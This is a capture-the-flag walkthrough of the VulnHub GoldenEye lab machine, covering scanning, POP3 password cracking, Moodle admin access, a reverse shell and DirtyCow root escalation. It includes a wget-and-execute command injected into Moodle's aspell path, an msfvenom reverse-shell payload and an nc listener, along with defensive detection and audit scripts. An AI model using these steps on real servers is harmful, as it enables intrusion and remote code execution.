
To break the boredom of a long flight, I had planned to play with the GoldenEye machine from VulnHub. Not only does it challenge my skills, it also helps me get through those arduous journeys sooner.

Scanning

Once the .ova file was downloaded, I imported it into VirtualBox and ran an Nmap scan of the entire network (192.168.99.100/24), which revealed the IP address assigned to the machine as 192.168.99.100. Then I did a quick Nmap scan; below are the results:

# nmap -T4 -F 192.168.99.100
Nmap scan report for 192.168.99.100
Host is up (0.00013s latency).
Not shown: 98 closed ports
PORT STATE SERVICE
25/tcp open smtp
80/tcp open http
MAC Address: 08:00:27:E6:5A:ED (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 0.15 seconds

Web Server

On looking at the web server it had the following message:

Navigating to the page mentioned in the image showed a login prompt. The JavaScript used on the index page contained the credentials (the password was base64 encoded) needed to log in to sev-home. The post-login page:

It gave a hint that POP3 is running on an unconventional port. An intense Nmap scan gave the following result, indicating that POP3 is running on ports 55006 and 55007:

Nmap scan report for 192.168.99.100
Host is up (0.00041s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
25/tcp open smtp Postfix smtpd
|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
| ssl-cert: Subject: commonName=ubuntu
| Issuer: commonName=ubuntu
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-04-24T03:22:34
| Not valid after: 2028-04-21T03:22:34
| MD5: cd4a d178 f216 17fb 21a6 0a16 8f46 c8c6
|_SHA-1: fda3 fc7b 6601 4746 96aa 0f56 b126 1c29 36e8 442c
|_ssl-date: TLS randomness does not represent time
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: GoldenEye Primary Admin Server
55006/tcp open ssl/pop3 Dovecot pop3d
|_pop3-capabilities: UIDL PIPELINING SASL(PLAIN) RESP-CODES USER AUTH-RESP-CODE TOP CAPA
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Issuer: commonName=localhost/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-04-24T03:23:52
| Not valid after: 2028-04-23T03:23:52
| MD5: d039 2e71 c76a 2cb3 e694 ec40 7228 ec63
|_SHA-1: 9d6a 92eb 5f9f e9ba 6cbd dc93 55fa 5754 219b 0b77
|_ssl-date: TLS randomness does not represent time
55007/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: AUTH-RESP-CODE PIPELINING RESP-CODES UIDL USER SASL(PLAIN) STLS TOP CAPA
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Issuer: commonName=localhost/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-04-24T03:23:52
| Not valid after: 2028-04-23T03:23:52
| MD5: d039 2e71 c76a 2cb3 e694 ec40 7228 ec63
|_SHA-1: 9d6a 92eb 5f9f e9ba 6cbd dc93 55fa 5754 219b 0b77
|_ssl-date: TLS randomness does not represent time

Enumeration

The sev-home page listed the names of the GoldenEye Network Operator Supervisors, which prompted a dictionary attack against those accounts on POP3. Hydra came to the rescue: the password was not complex, so it was easy to crack with the word list available in Kali Linux.

Checking the mails with telnet connected to POP3 (using the commands USER, PASS, STAT to get statistics, and RETR n to retrieve message n) gave a hint that a new trainee, Xenia, had joined the company and had to be given access to the application. Furthermore, the host entry ‘192.168.99.100 severnaya-station.com’ had to be added to the ‘/etc/hosts’ file to reach the application, because the requests need a Host header of ‘severnaya-station.com’.

One of the emails received by Natalya had the login credentials for Moodle. After logging in, it turned out that Xenia did not have access to view the course, but there was a welcome message from Dr_dork giving his username as ‘doak’. His password could be cracked the same way, and his POP3 mailbox revealed a secret image. Searching the image file for strings gave a base64-encoded password, which was the admin password for the Moodle system.
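The POP3 dictionary attack above is noisy on the server side. As an added example (not from the original post), the following Python detector runs over constructed Dovecot pop3-login log lines and flags any source IP that reaches three authentication failures within a minute, and notes whether a successful login followed the burst; the line format is assumed from Dovecot's default syslog output.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample lines in Dovecot's default syslog format (not captured from the box).
SAMPLE_LOG = """\
Apr 24 10:01:02 ubuntu dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<boris>, method=PLAIN, rip=192.168.99.101, lip=192.168.99.100, session=<a1>
Apr 24 10:01:03 ubuntu dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 1 secs): user=<boris>, method=PLAIN, rip=192.168.99.101, lip=192.168.99.100, session=<a2>
Apr 24 10:01:03 ubuntu dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 1 secs): user=<natalya>, method=PLAIN, rip=192.168.99.101, lip=192.168.99.100, session=<a3>
Apr 24 10:01:04 ubuntu dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 1 secs): user=<boris>, method=PLAIN, rip=192.168.99.101, lip=192.168.99.100, session=<a4>
Apr 24 10:01:05 ubuntu dovecot: pop3-login: Login: user=<boris>, method=PLAIN, rip=192.168.99.101, lip=192.168.99.100, mpid=1234, session=<a5>
Apr 24 10:30:00 ubuntu dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 3 secs): user=<alec>, method=PLAIN, rip=10.0.0.5, lip=192.168.99.100, session=<b1>
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ dovecot: pop3-login: "
    r"(?P<event>Login|Disconnected \(auth failed[^)]*\)): user=<(?P<user>[^>]*)>"
    r".*?\brip=(?P<rip>[\d.]+)"
)

def parse_events(log_text):
    """Yield (timestamp, source_ip, user, login_succeeded) for each pop3-login line."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")  # syslog carries no year
            yield ts, m["rip"], m["user"], m["event"] == "Login"

def detect_bruteforce(log_text, threshold=3, window_secs=60):
    """Flag source IPs with >= threshold failed logins inside a window_secs window.
    Result: {ip: {"failures": n, "users": {...}, "success_after": bool}}."""
    recent = defaultdict(list)  # ip -> [(ts, user)] failures still inside the window
    report = {}
    for ts, ip, user, ok in parse_events(log_text):
        if ok:
            if ip in report:  # a guess landed right after the burst: password was found
                report[ip]["success_after"] = True
            continue
        recent[ip] = [(t, u) for t, u in recent[ip] if (ts - t).total_seconds() <= window_secs]
        recent[ip].append((ts, user))
        if len(recent[ip]) >= threshold:
            entry = report.setdefault(ip, {"failures": 0, "users": set(), "success_after": False})
            entry["failures"] = max(entry["failures"], len(recent[ip]))
            entry["users"].update(u for _, u in recent[ip])
    return report

if __name__ == "__main__":
    for ip, info in detect_bruteforce(SAMPLE_LOG).items():
        print(ip, info)
```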

Reverse Shell

To get a reverse shell, follow these steps in Moodle:

  1. Change the executable path of ‘spellcheck’ to run code.
  2. Replace the default spell check processor of the TinyMCE HTML editor with ‘PSpellShell’ (this is the one that uses the spellcheck binary at the configured path).
  3. Change the aspell path variable under ‘System paths’ (under Server) to sh -c ‘(wget http://192.168.99.101/metershell -O /tmp/metershell; chmod +x /tmp/metershell;/tmp/metershell &)’ and save the settings.
  4. Generate a payload with msfvenom using the command msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.99.101 LPORT=443 -f elf -o metershell, replacing the IP address with that of your machine.
  5. Start a web server on port 80, either Apache or python -m SimpleHTTPServer 80.
  6. Start the listener for the reverse shell using the command nc -lvp 443.
  7. Go to any page where TinyMCE is used (for example, the blog), add some text and run a spell check. Doing this will get us a reverse shell like the one in the screenshot below:
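The steps above work because Moodle hands the configured aspell path to a shell, so a tampered path is a persistent backdoor that survives in the config table. As an added example (not from the original post or from Moodle), the following Python audit checks ‘System paths’ settings for anything that is not a bare absolute path to a binary; the setting names aspellpath, pathtodu and pathtoclam are assumed, and the sample values are constructed.

```python
import os
import re

# Whitespace and shell metacharacters have no business in a path Moodle passes to a subprocess.
SHELL_META = re.compile(r"""[\s;&|`$<>()'"\\]""")
# Interpreters and downloaders that indicate the setting has been turned into a command.
SUSPICIOUS_WORDS = re.compile(r"\b(sh|bash|dash|wget|curl|nc|python|perl)\b")

def audit_system_path(name, value, check_fs=False):
    """Return a list of findings for one 'System paths' setting; [] means it looks sane.
    With check_fs=True the path must also exist as an executable regular file."""
    findings = []
    if not value:
        return findings  # unset means the feature is disabled, which is fine
    if not value.startswith("/"):
        findings.append(f"{name}: not an absolute path ({value!r})")
    if SHELL_META.search(value):
        findings.append(f"{name}: contains whitespace or shell metacharacters ({value!r})")
    if SUSPICIOUS_WORDS.search(value):
        findings.append(f"{name}: references an interpreter or downloader ({value!r})")
    if check_fs and not (os.path.isfile(value) and os.access(value, os.X_OK)):
        findings.append(f"{name}: does not point at an existing executable file")
    return findings

def audit_all(settings, check_fs=False):
    """Audit a {setting_name: value} mapping; only settings with findings are returned."""
    report = {}
    for name, value in settings.items():
        findings = audit_system_path(name, value, check_fs)
        if findings:
            report[name] = findings
    return report

# Constructed sample (setting names assumed): one value tampered in the shape described
# in the post (placeholder IP), one sane value and one unset value.
SAMPLE_SETTINGS = {
    "aspellpath": "sh -c '(wget http://203.0.113.5/x -O /tmp/x; chmod +x /tmp/x; /tmp/x &)'",
    "pathtodu": "/usr/bin/du",
    "pathtoclam": "",
}

if __name__ == "__main__":
    for name, findings in audit_all(SAMPLE_SETTINGS).items():
        print(name, *findings, sep="\n  ")
```

Scheduling this against a dump of Moodle's config table alongside the web-server logs gives a cheap check that the spell-check path has not been repurposed.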

Privilege Elevation

The Linux kernel was an older version vulnerable to DirtyCow. Compiling the exploit and running it gave a root shell.

Although the challenges were not too complex, it was fun getting the root shell and it kept me away from the boredom during my journey.
